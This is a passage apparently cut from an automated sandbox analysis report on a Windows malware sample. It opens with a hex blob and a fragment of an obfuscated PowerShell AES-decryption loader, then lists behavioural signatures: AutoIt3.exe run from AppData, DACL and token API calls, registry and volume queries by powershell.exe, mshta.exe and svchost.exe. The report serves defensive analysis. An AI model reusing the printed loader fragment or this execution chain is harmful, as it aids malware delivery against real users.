c50b0f62cad51058d241391a6b2446d777805760a992c50dbc13108296d969c721cec4ba28b6488ab72df32bd755fc7d5c5d3d56680f0aab9bdc8dd664cbbf8e2bcdd82462778cef31e33c24a4749f12603eb49d4c9d110a17107c7b97c1e54eb654988e65ce15cd969f93c091dfabe466d71228914296a73b782ecf0fff3df80313ca3128bcd8296f524ee35db155c2ae0ef4c69075b57e36d24e8e31218ca60aa4fa168657c062b42b2f5ea45aafdbf6276668f6a9f867184e90c03c86c65bcce49654a66fa3d306694ffacdd32f762e1d88075f651c9159f15813eee0ca477a8c578c19d44d1e39e106809a3cd869b8e088acdcce32e23a70f5f942e8daee3012d81b73b3b94d05d727127dfda24f3f54ec5e3bfac83121df59e941dc4aca17ca5ead44c61de8bdf84e32290f7543abe02060dc41362b94a5f07eeee330b97553b46859432cc68f214b302c4e6f63055d0f83e01f7974f1b300238eec9b49ac5de3c1d9a3ed90f4056fdace9cd348ace2412cc387a9ff17100724c029b670ea9c692e997bff90aa0531e793e1dd4154e64151dcff01cce768c6db40ffff11494df2db99e1c1159873fa31a4e0eb1036654de9137700e275de2ae79bcb348d213215787a6a3452f822ef24303fc84259471e723768093e063d12dfca583a0490658323b87f8a0c3e9109f45d9a37f26ac77552d7c68589ca46a0e8d1ab24d1b10a54d0fb256338b5880738577ec794452bc27b0ba2fd9c876306e1588376a94292582e639fbc261e841194317c38ec2f485f56690f6ace333ee430ed468c2f9690e96f6497247eda10e0ff53275b4125360f8405e4758a308e913b6295d4f395d02b2239e6e4257b5152e7f8acd075e8c6b312ec73595c476bb1e814d001b81f9');$wkctd = [system.security.cryptography.aes]::create();$wkctd.key = tcqzac('7151766748794165544d79435557754Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D1C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,15_2_001D1C68
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D2777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_001D2777
      Source: AutoIt3.exe, 0000000F.00000000.1972604389.0000000000231000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 00000010.00000000.1997409571.0000000000231000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe.7.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: AutoIt3.exeBinary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00190CA4 cpuid 15_2_00190CA4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_015CB04D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,15_2_015D001D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_015CB157
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,GetACP,15_2_015D1569
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,15_2_015CB971
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,15_2_015CFFD1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_0155A3E5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,16_2_0155F369
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,16_2_0155F3B5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_0155A4EF
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,GetACP,16_2_01560901
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: GetLocaleInfoA,16_2_0155AD09
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
